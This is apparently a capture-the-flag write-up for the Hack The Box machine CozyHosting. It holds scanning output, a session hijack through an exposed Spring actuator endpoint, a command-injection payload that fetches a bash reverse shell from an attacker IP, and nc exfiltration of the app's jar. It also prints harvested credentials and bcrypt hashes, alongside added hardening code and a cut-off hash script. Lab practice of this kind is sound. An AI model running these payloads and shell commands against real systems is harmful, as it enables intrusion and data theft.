    HTB-CozyHosting

    https://app.hackthebox.com/machines/CozyHosting

    ┌──(kwkl㉿kwkl)-[~]
    └─$ tail -1 /etc/hosts
    10.10.11.230 cozyhosting.htb

    ┌──(kwkl㉿kwkl)-[~]
    └─$ nmap -A 10.10.11.230 -T4
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-23 20:47 HKT
    Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
    Connect Scan Timing: About 7.27% done; ETC: 20:50 (0:02:59 remaining)
    Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
    Connect Scan Timing: About 10.12% done; ETC: 20:50 (0:02:31 remaining)
    Nmap scan report for 10.10.11.230 (10.10.11.230)
    Host is up (0.61s latency).
    Not shown: 997 closed tcp ports (conn-refused)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
    |_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
    80/tcp   open  http    nginx 1.18.0 (Ubuntu)
    9999/tcp open  abyss?
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 256.99 seconds
                                                                      
    

    image-20230923205309502

    ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
    └─$ sudo ./fscan_amd64 -h 10.10.11.230   
    
       ___                              _    
      / _ \     ___  ___ _ __ __ _  ___| | __ 
     / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
    / /_\\_____\__ \ (__| | | (_| | (__|   <    
    \____/     |___/\___|_|  \__,_|\___|_|\_\   
                         fscan version: 1.8.2
    start infoscan
    (icmp) Target 10.10.11.230    is alive
    [*] Icmp alive hosts len is: 1
    10.10.11.230:8000 open
    10.10.11.230:22 open
    10.10.11.230:80 open
    [*] alive ports len is: 3
    start vulscan
    [*] WebTitle: http://10.10.11.230       code:301 len:178    title:301 Moved Permanently 跳转url: http://cozyhosting.htb
    [*] WebTitle: http://cozyhosting.htb    code:200 len:12706  title:Cozy Hosting - Home
    已完成 1/3 [-] ssh 10.10.11.230:22 root 123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    [+] http://cozyhosting.htb poc-yaml-springboot-env-unauth spring2
    已完成 2/3 [-] ssh 10.10.11.230:22 root root123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 2/3 [-] ssh 10.10.11.230:22 root sysadmin ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
    已完成 3/3
    [*] 扫描结束,耗时: 7m6.791807771s
    
    
    ┌──(kwkl㉿kwkl)-[~/tools/scan_tool/dirsearch-0.4.3]
    └─$ ./dirsearch.py -u http://cozyhosting.htb/
    
      _|. _ _  _  _  _ _|_    v0.4.3
     (_||| _) (/_(_|| (_| )
    
    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
    
    Output File: /home/kwkl/tools/scan_tool/dirsearch-0.4.3/reports/http_cozyhosting.htb/__23-09-30_10-56-44.txt
    
    Target: http://cozyhosting.htb/
    
    [10:56:44] Starting:                                                                                                                                                             
    [10:57:32] 200 -    0B  - /;/login                                          
    [10:57:32] 200 -    0B  - /;/json
    [10:57:32] 200 -    0B  - /;/admin
    [10:57:32] 200 -    0B  - /;admin/
    [10:57:32] 200 -    0B  - /;login/
    [10:57:32] 200 -    0B  - /;json/                                           
    [10:57:32] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
    [10:57:35] 400 -  435B  - /a%5c.aspx                                        
    [10:57:38] 200 -    0B  - /actuator/;/auditevents                           
    [10:57:38] 200 -    0B  - /actuator/;/auditLog                              
    [10:57:39] 200 -  634B  - /actuator                                         
    [10:57:39] 200 -    0B  - /actuator/;/conditions
    [10:57:39] 200 -    0B  - /actuator/;/caches
    [10:57:39] 200 -    0B  - /actuator/;/configprops
    [10:57:39] 200 -    0B  - /actuator/;/beans
    [10:57:39] 200 -    0B  - /actuator/;/configurationMetadata
    [10:57:39] 200 -    0B  - /actuator/;/dump
    [10:57:39] 200 -    0B  - /actuator/;/env
    [10:57:39] 200 -    0B  - /actuator/;/features
    [10:57:39] 200 -    0B  - /actuator/;/flyway
    [10:57:39] 200 -    0B  - /actuator/;/events
    [10:57:39] 200 -    0B  - /actuator/;/exportRegisteredServices
    [10:57:39] 200 -    0B  - /actuator/;/health
    [10:57:39] 200 -    0B  - /actuator/;/heapdump
    [10:57:39] 200 -    0B  - /actuator/;/info
    [10:57:39] 200 -    0B  - /actuator/;/httptrace
    [10:57:39] 200 -    0B  - /actuator/;/healthcheck
    [10:57:39] 200 -    0B  - /actuator/;/logfile
    [10:57:39] 200 -    0B  - /actuator/;/jolokia
    [10:57:39] 200 -    0B  - /actuator/;/loggers
    [10:57:39] 200 -    0B  - /actuator/;/loggingConfig
    [10:57:39] 200 -    0B  - /actuator/;/prometheus
    [10:57:39] 200 -    0B  - /actuator/;/integrationgraph
    [10:57:39] 200 -    0B  - /actuator/;/liquibase
    [10:57:39] 200 -    0B  - /actuator/;/mappings
    [10:57:39] 200 -    0B  - /actuator/;/metrics
    [10:57:39] 200 -    0B  - /actuator/;/refresh
    [10:57:39] 200 -    0B  - /actuator/;/registeredServices
    [10:57:39] 200 -    0B  - /actuator/;/sessions
    [10:57:39] 200 -    0B  - /actuator/;/releaseAttributes
    [10:57:39] 200 -    0B  - /actuator/;/resolveAttributes
    [10:57:39] 200 -    0B  - /actuator/;/ssoSessions
    [10:57:39] 200 -    0B  - /actuator/;/sso
    [10:57:39] 200 -    0B  - /actuator/;/scheduledtasks
    [10:57:39] 200 -    0B  - /actuator/;/shutdown
    [10:57:39] 200 -    0B  - /actuator/;/springWebflow
    [10:57:39] 200 -    0B  - /actuator/;/statistics
    [10:57:39] 200 -    0B  - /actuator/;/status
    [10:57:39] 200 -    0B  - /actuator/;/trace
    [10:57:39] 200 -    0B  - /actuator/;/threaddump
    [10:57:40] 200 -    5KB - /actuator/env                                     
    [10:57:40] 200 -   15B  - /actuator/health                                  
    [10:57:41] 200 -   10KB - /actuator/mappings                                
    [10:57:41] 200 -   98B  - /actuator/sessions                                
    [10:57:43] 200 -  124KB - /actuator/beans                                   
    [10:57:45] 401 -   97B  - /admin                                            
    [10:57:47] 200 -    0B  - /admin/%3bindex/                                  
    [10:57:54] 200 -    0B  - /Admin;/                                          
    [10:57:54] 200 -    0B  - /admin;/                                          
    [10:58:28] 200 -    0B  - /axis//happyaxis.jsp                              
    [10:58:28] 200 -    0B  - /axis2-web//HappyAxis.jsp                         
    [10:58:28] 200 -    0B  - /axis2//axis2-web/HappyAxis.jsp                   
    [10:58:38] 200 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
    [10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload_f9.swf       
    [10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload.swf
    [10:59:02] 500 -   73B  - /error                                            
    [10:59:04] 200 -    0B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/ 
    [10:59:05] 200 -    0B  - /extjs/resources//charts.swf                      
    [10:59:28] 200 -    0B  - /html/js/misc/swfupload//swfupload.swf            
    [10:59:35] 200 -    0B  - /jkstatus;                                        
    [10:59:40] 200 -    4KB - /login                                            
    [10:59:41] 200 -    0B  - /login.wdm%2e                                     
    [10:59:42] 204 -    0B  - /logout                                           
                                                                                 
    Task Completed                                                                                                                                                                   
                     
    

    Found: the sessions endpoint

    http://cozyhosting.htb/actuator/sessions

    image-20230930110748703

    F0FD1F42518BC0B9959B98BED562DC79 "kanderson"

    image-20230930111009958

    Using this session id,

    image-20230930111619244

    we can log in as kanderson.

    image-20230930112703766

    kanderson%20||%20whoami

    ;'id'

    image-20230930122338971

    http://10.10.16.51:5555/1@1

    After many tries:

    ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
    └─$ cat 1@1
    bash -c "bash -i>& /dev/tcp/10.10.16.51/6666 0>&1"

    ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
    └─$ python3 -m http.server 5555
    Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
    10.10.16.51 - - [01/Oct/2023 22:17:55] "GET /1@1 HTTP/1.1" 200 -
    10.10.16.51 - - [01/Oct/2023 22:18:04] "GET /1@1 HTTP/1.1" 200 -
    10.10.11.230 - - [01/Oct/2023 22:18:52] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:18:52] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:19:59] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:19:59] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:20:42] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:20:42] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:22:11] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:22:11] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:22:31] code 404, message File not found
    10.10.11.230 - - [01/Oct/2023 22:22:31] "GET /1 HTTP/1.1" 404 -
    10.10.11.230 - - [01/Oct/2023 22:22:47] "GET /1@1 HTTP/1.1" 200 -
    10.10.11.230 - - [01/Oct/2023 22:35:39] "GET /1@1 HTTP/1.1" 200 -
    
    
    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 6666
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::6666
    Ncat: Listening on 0.0.0.0:6666
    
    

    image-20231001230450457

    Raw request:

    POST /executessh HTTP/1.1
    Host: cozyhosting.htb
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 71
    Origin: http://cozyhosting.htb
    Connection: close
    Referer: http://cozyhosting.htb/admin
    Cookie: JSESSIONID=7BFD184ED7E857BC1FDD473077783C27//
    Upgrade-Insecure-Requests: 1
    
    host=1&username=;kanderson||curl$IFS$9http://10.10.16.51:5555/1@1|sh%0a
    
    HTTP/1.1 504 Gateway Time-out
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 01 Oct 2023 14:36:38 GMT
    Content-Type: text/html
    Content-Length: 176
    Connection: close

    <html>
    <head><title>504 Gateway Time-out</title></head>
    <body>
    <center><h1>504 Gateway Time-out</h1></center>
    <hr><center>nginx/1.18.0 (Ubuntu)</center>
    </body>
    </html>

    nc pops a shell!

    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 6666
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::6666
    Ncat: Listening on 0.0.0.0:6666
    Ncat: Connection from 10.10.11.230.
    Ncat: Connection from 10.10.11.230:55596.
    bash: cannot set terminal process group (1063): Inappropriate ioctl for device
    bash: no job control in this shell
    app@cozyhosting:/app$ id
    
    
    app@cozyhosting:/app$ id
    id
    uid=1001(app) gid=1001(app) groups=1001(app)
    app@cozyhosting:/app$ ls
    ls
    cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ ls -al
    ls -al
    total 58856
    drwxr-xr-x  2 root root     4096 Aug 14 14:11 .
    drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
    -rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ nc 10.10.16.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
    <6.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
    nc: missing port number
    app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
    <6.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
    nc: port number invalid: cloudhosting.zip
    app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc: port number invalid: cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
    nc: port number invalid: cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar
    nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar
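The shell above exists because the username field of /executessh ends up inside a shell command line. As an added example, not the cloudhosting app's handler (its source is not shown in this write-up, so the concatenated ssh line is an assumption), here is the same step with allow-list validation and an argv list handed to ProcessBuilder, so no shell ever parses the input; the patterns and the ssh options are my choices.

```java
import java.util.List;
import java.util.regex.Pattern;

// Added example: hardened handling of the host/username pair that /executessh accepts.
// Not the cloudhosting app's real code; the handler's source is not in the write-up.
public class SafeSshCommand {

    // Portable Unix username: lowercase letters, digits, '_', '.', '-'; 32 chars max.
    // Rejects every shell metacharacter the write-up's payload relies on (';', '|', '$', newline).
    static final Pattern USERNAME = Pattern.compile("^[a-z_][a-z0-9_.-]{0,31}$");

    // RFC 1123 hostname or dotted IPv4: labels of letters/digits/'-', joined by '.'.
    // Neither pattern allows a leading '-', so a value can never be parsed as an ssh option.
    static final Pattern HOST = Pattern.compile(
            "^(?=.{1,253}$)([a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?\\.)*[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$",
            Pattern.CASE_INSENSITIVE);

    // The vulnerable shape (assumed, kept only for contrast and never executed here): once this
    // string is handed to "bash -c", everything after the first ';' in username runs as a command.
    static String vulnerableShellLine(String host, String username) {
        return "ssh -o ConnectTimeout=1 " + username + "@" + host;
    }

    // Hardened: validate both fields against the allow-list patterns, then build an argv list.
    // Returns null when input is rejected, so the caller answers 400 instead of running anything.
    static List<String> buildArgv(String host, String username) {
        if (host == null || username == null) return null;
        if (!USERNAME.matcher(username).matches() || !HOST.matcher(host).matches()) return null;
        // new ProcessBuilder(argv).start() passes this list straight to execve():
        // no shell is involved, so metacharacters inside an argument are inert.
        return List.of("ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=1",
                       username + "@" + host, "true");
    }

    public static void main(String[] args) {
        // Constructed inputs: the injected username from the write-up and a legitimate one.
        String injected = ";kanderson||curl$IFS$9http://10.10.16.51:5555/1@1|sh\n";
        System.out.println("vulnerable shape would hand bash: " + vulnerableShellLine("1", injected));
        System.out.println("hardened argv, injected input : " + buildArgv("1", injected));
        System.out.println("hardened argv, legitimate input: " + buildArgv("10.10.11.230", "kanderson"));
    }
}
```

The injected value is refused before any process is started; the legitimate pair becomes a fixed argv in which the user-controlled text is a single argument.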
    
    
    
    

    Receiving end:

    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 7777 > cloudhosting.jar
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::7777
    Ncat: Listening on 0.0.0.0:7777
    Ncat: Connection from 10.10.11.230.
    Ncat: Connection from 10.10.11.230:44434.
    
    
    

    Got the jar archive:

                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~]
    └─$ cp cloudhosting.jar cloudhosting.zip

    ┌──(kwkl㉿kwkl)-[~]
    └─$ mkdir cloud

    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ mv ../cloudhosting.zip ../cloud

    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ ls
    BOOT-INF  cloudhosting.zip  META-INF  org

    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ unzip cloudhosting.zip

    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ grep "password" ./ -r
    grep: ./cloudhosting.zip:匹配到二进制文件
    grep: ./BOOT-INF/lib/spring-security-crypto-6.0.1.jar:匹配到二进制文件
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:
    grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot:匹配到二进制文件
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
    ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
    grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class:匹配到二进制文件
    grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class:匹配到二进制文件
    grep: ./BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class:匹配到二进制文件
    ./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
    ./BOOT-INF/classes/templates/login.html:    Please enter your password!
    ./BOOT-INF/classes/templates/login.html:    Invalid username or password

    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$ grep "username" ./ -r
    grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class:匹配到二进制文件
    grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class:匹配到二进制文件
    grep: ./BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class:匹配到二进制文件
    ./BOOT-INF/classes/application.properties:spring.datasource.username=postgres
    ./BOOT-INF/classes/templates/login.html:    Please enter your username.
    ./BOOT-INF/classes/templates/login.html:    Invalid username or password
    ./BOOT-INF/classes/templates/admin.html:
    ./BOOT-INF/classes/templates/admin.html:

    ┌──(kwkl㉿kwkl)-[~/cloud]
    └─$

    Got some PostgreSQL info:

    ./BOOT-INF/classes/application.properties:spring.datasource.username=postgres

    ./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR

    Using jd-gui:

    image-20231002110424109

    server.address=127.0.0.1
    server.servlet.session.timeout=5m
    management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
    management.endpoint.sessions.enabled = true
    spring.datasource.driver-class-name=org.postgresql.Driver
    spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
    spring.jpa.hibernate.ddl-auto=none
    spring.jpa.database=POSTGRESQL
    spring.datasource.platform=postgres
    spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
    spring.datasource.username=postgres
    spring.datasource.password=Vg&nvzAQ7XxR
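As an added example (not from this write-up or the cloudhosting app), a small Java audit that parses the properties above, flags what management.endpoints.web.exposure.include hands out over HTTP, and prints a hardened replacement; the sensitivity list and the hardened values are my choices, with the two management.server.* keys being standard Spring Boot properties.

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;

// Added example: audits a Spring Boot application.properties text for actuator
// over-exposure. Not part of the write-up or of the cloudhosting app.
public class ActuatorExposureAudit {

    static final String INCLUDE_KEY = "management.endpoints.web.exposure.include";

    // Endpoints whose content is dangerous when reachable without authentication.
    // sessions leaks live JSESSIONID values (the hijack used in the write-up);
    // env/configprops/beans/mappings reveal configuration, secrets and routes;
    // heapdump/threaddump leak process memory; shutdown stops the app.
    static final Set<String> SENSITIVE = Set.of(
            "sessions", "env", "configprops", "beans", "mappings", "heapdump",
            "threaddump", "loggers", "shutdown", "jolokia", "httptrace", "*");

    // Endpoints that are usually acceptable on a public listener.
    static final Set<String> LOW_RISK = Set.of("health", "info");

    // Minimal .properties parser: "key=value" or "key = value", '#'/'!' comments.
    static Map<String, String> parse(String text) {
        Map<String, String> props = new LinkedHashMap<>();
        for (String raw : text.split("\n")) {
            String line = raw.trim();
            if (line.isEmpty() || line.startsWith("#") || line.startsWith("!")) continue;
            int eq = line.indexOf('=');
            if (eq < 0) continue;
            props.put(line.substring(0, eq).trim(), line.substring(eq + 1).trim());
        }
        return props;
    }

    // One finding per exposed endpoint that is not low-risk; empty when the config is fine.
    static List<String> audit(Map<String, String> props) {
        List<String> findings = new ArrayList<>();
        // Spring Boot's own default exposes only "health" over HTTP.
        String include = props.getOrDefault(INCLUDE_KEY, "health");
        for (String raw : include.split(",")) {
            String endpoint = raw.trim();
            if (endpoint.isEmpty() || LOW_RISK.contains(endpoint)) continue;
            if (SENSITIVE.contains(endpoint)) {
                findings.add("sensitive actuator endpoint exposed: /actuator/" + endpoint);
            } else {
                findings.add("non-default actuator endpoint exposed, review: /actuator/" + endpoint);
            }
        }
        return findings;
    }

    // Hardened replacement for the lines found in the jar: only health/info, and the
    // whole actuator moved to a separate loopback-only management listener
    // (management.server.port / management.server.address are standard Spring Boot keys).
    static String hardened() {
        return String.join("\n",
                INCLUDE_KEY + "=health,info",
                "management.endpoint.sessions.enabled=false",
                "management.server.port=8081",
                "management.server.address=127.0.0.1");
    }

    public static void main(String[] args) {
        // Constructed input: the actuator lines recovered from application.properties above.
        String weak = String.join("\n",
                "server.address=127.0.0.1",
                "management.endpoints.web.exposure.include=health,beans,env,sessions,mappings",
                "management.endpoint.sessions.enabled = true");
        for (String finding : audit(parse(weak))) System.out.println("[!] " + finding);
        System.out.println("--- hardened replacement ---");
        System.out.println(hardened());
        System.out.println("findings after hardening: " + audit(parse(hardened())).size());
    }
}
```

Against the jar's configuration the audit reports beans, env, sessions and mappings; against the hardened text it reports nothing, and with the management listener bound to 127.0.0.1:8081 nothing under /actuator is reachable through the nginx proxy at all.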

    image-20231002110833894

    // Decompiled from BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class;
    // jd-gui shows the package as BOOT-INF.classes.htb.cloudhosting.scheduled because
    // the jar was unpacked first. The real package is htb.cloudhosting.scheduled.
    package htb.cloudhosting.scheduled;

    import java.io.IOException;
    import java.util.concurrent.TimeUnit;
    import org.springframework.scheduling.annotation.Scheduled;
    import org.springframework.stereotype.Component;

    // Logs kanderson in every 5 minutes with a hard-coded password, which is why
    // a live kanderson session always shows up in /actuator/sessions.
    @Component
    public class FakeUser {
        @Scheduled(timeUnit = TimeUnit.MINUTES, fixedDelay = 5L)
        public void login() throws IOException {
            System.out.println("Logging in user ...");
            Runtime.getRuntime().exec(new String[] { "curl", "localhost:8080/login",
                    "--request", "POST",
                    "--header", "Content-Type: application/x-www-form-urlencoded",
                    "--data-raw", "username=kanderson&password=MRdEQuv6~6P9", "-v" });
        }
    }

    Connect to PostgreSQL!

                                                                                                                                                                                     
    ┌──(kwkl㉿kwkl)-[~]
    └─$ nc -lvvp 6666
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::6666
    Ncat: Listening on 0.0.0.0:6666
    Ncat: Connection from 10.10.11.230.
    Ncat: Connection from 10.10.11.230:46842.
    bash: cannot set terminal process group (1064): Inappropriate ioctl for device
    bash: no job control in this shell
    app@cozyhosting:/app$ python3 -c 'import pty;pty.spawn("/bin/bash")'
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    app@cozyhosting:/app$ ls
    ls
    cloudhosting-0.0.1.jar
    app@cozyhosting:/app$ psql -h localhost -p 5432 -U postgres -d cozyhosting
    psql -h localhost -p 5432 -U postgres -d cozyhosting
    Password for user postgres: Vg&nvzAQ7XxR
    
    psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
    SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
    Type "help" for help.
    
    cozyhosting=# ls
    ls
    cozyhosting-# help
    help
    Use \? for help or press control-C to clear the input buffer.
    cozyhosting-# \?
    \?
    WARNING: terminal is not fully functional
    Press RETURN to continue

    General
      \copyright             show PostgreSQL usage and distribution terms
      \crosstabview [COLUMNS] execute query and display results in crosstab
      \errverbose            show most recent error message at maximum verbosity
      \g [(OPTIONS)] [FILE]  execute query (and send results to file or |pipe);
                             \g with no arguments is equivalent to a semicolon
      \gdesc                 describe result of query, without executing it
      \gexec                 execute query, then execute each value in its result
      \gset [PREFIX]         execute query and store results in psql variables
      \gx [(OPTIONS)] [FILE] as \g, but forces expanded output mode
      \q                     quit psql
      \watch [SEC]           execute query every SEC seconds

    Help
      \? [commands]          show help on backslash commands
      \? options             show help on psql command-line options
      \? variables           show help on special variables
      \h [NAME]              help on syntax of SQL commands, * for all commands

    Query Buffer
      \e [FILE] [LINE]       edit the query buffer (or file) with external editor
      \ef [FUNCNAME [LINE]]  edit function definition with external editor
      \ev [VIEWNAME [LINE]]  edit view definition with external editor
      \p                     show the contents of the query buffer
      \r                     reset (clear) the query buffer
      \s [FILE]              display history or save it to file
      \w FILE                write query buffer to file

    Input/Output
      \copy ...              perform SQL COPY with data stream to the client host
      \echo [-n] [STRING]    write string to standard output (-n for no newline)
      \i FILE                execute commands from file
      \ir FILE               as \i, but relative to location of current script
      \o [FILE]              send all query results to file or |pipe
      \qecho [-n] [STRING]   write string to \o output stream (-n for no newline)
      \warn [-n] [STRING]    write string to standard error (-n for no newline)

    Conditional
      \if EXPR               begin conditional block
      \elif EXPR             alternative within current conditional block
      \else                  final alternative within current conditional block
      \endif                 end conditional block

    Informational
      (options: S = show system objects, + = additional detail)
      \d[S+]                 list tables, views, and sequences
      \d[S+]  NAME           describe table, view, sequence, or index
      \da[S]  [PATTERN]      list aggregates
      \dA[+]  [PATTERN]      list access methods
      \dAc[+] [AMPTRN [TYPEPTRN]]  list operator classes
      \dAf[+] [AMPTRN [TYPEPTRN]]  list operator families
      \dAo[+] [AMPTRN [OPFPTRN]]   list operators of operator families
      \dAp[+] [AMPTRN [OPFPTRN]]   list support functions of operator families
      \db[+]  [PATTERN]      list tablespaces
      \dc[S+] [PATTERN]      list conversions
      \dC[+]  [PATTERN]      list casts
      \dd[S]  [PATTERN]      show object descriptions not displayed elsewhere
      \dD[S+] [PATTERN]      list domains
      \ddp    [PATTERN]      list default privileges
      \dE[S+] [PATTERN]      list foreign tables
      \des[+] [PATTERN]      list foreign servers
      \det[+] [PATTERN]      list foreign tables
      \deu[+] [PATTERN]      list user mappings
      \dew[+] [PATTERN]      list foreign-data wrappers
      \df[anptw][S+] [FUNCPTRN [TYPEPTRN ...]]
                             list [only agg/normal/procedure/trigger/window] functions
      \dF[+]  [PATTERN]      list text search configurations
      \dFd[+] [PATTERN]      list text search dictionaries
      \dFp[+] [PATTERN]      list text search parsers
      \dFt[+] [PATTERN]      list text search templates
      \dg[S+] [PATTERN]      list roles
      \di[S+] [PATTERN]      list indexes
      \dl                    list large objects, same as \lo_list
    :quit
    cozyhosting-# quit
    Use \q to quit.
    cozyhosting-# dt
    dt
    cozyhosting-# \dt
    \dt
    WARNING: terminal is not fully functional
    Press RETURN to continue

             List of relations
     Schema | Name  | Type  |  Owner
    --------+-------+-------+----------
     public | hosts | table | postgres
     public | users | table | postgres
    (2 rows)

    (END)
    (END)q
    cozyhosting-#
    cozyhosting-# select * from users;
    select * from users;
    ERROR:  syntax error at or near "ls"
    LINE 1: ls
            ^
    cozyhosting=# select * from users;
    select * from users;
    WARNING: terminal is not fully functional
    Press RETURN to continue

       name    |                           password                           | role
    -----------+--------------------------------------------------------------+-------
     kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
     admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
    (2 rows)

    (END)
    
    


    ┌──(kwkl㉿kwkl)-[~]
    └─$ cat hash2                     
    $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm 
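What john printed about this hash, unpacked as an added example (this snippet is not from the original writeup): the `$2a$10$` prefix is the modular-crypt header, `10` is the bcrypt cost, and john's "Cost 1 (iteration count) is 1024" is simply 2^10. The script pulls that cost out of the string in hash2 and turns the 245.8 c/s john reported into a time-to-exhaust figure for a wordlist, which shows why a cost-10 bcrypt on a CPU falls to a dictionary word such as manchesterunited but not to brute force. The rockyou line count is an assumption to check with `wc -l` on your own copy.

```shell
#!/bin/sh
# Added example, not part of the original writeup: pull the cost factor out of
# the bcrypt string john loaded and relate it to the crack rate john reported.

# Hash exactly as shown in hash2 above.
HASH='$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'

# bcrypt_cost HASH: print the cost field of a modular-crypt bcrypt string.
# Layout is $2<a|b|x|y>$<2-digit cost>$<22-char salt><31-char digest>, 60 chars.
bcrypt_cost() {
    printf '%s\n' "$1" | grep -Eq '^\$2[abxy]\$[0-9]{2}\$[./A-Za-z0-9]{53}$' \
        || { echo "not a bcrypt string: $1" >&2; return 1; }
    cost=$(printf '%s' "$1" | cut -d '$' -f 3)
    echo "${cost#0}"             # "08" -> "8": avoid octal inside $(( ))
}

# bcrypt_rounds HASH: the cost is log2 of the key-setup iteration count, so
# $2a$10$ means 2^10 = 1024 rounds, the "Cost 1 ... is 1024" john printed.
bcrypt_rounds() {
    c=$(bcrypt_cost "$1") || return 1
    echo $(( 1 << c ))
}

# wordlist_seconds WORDS RATE: whole seconds to exhaust WORDS candidates at
# RATE candidates per second (john's c/s column).
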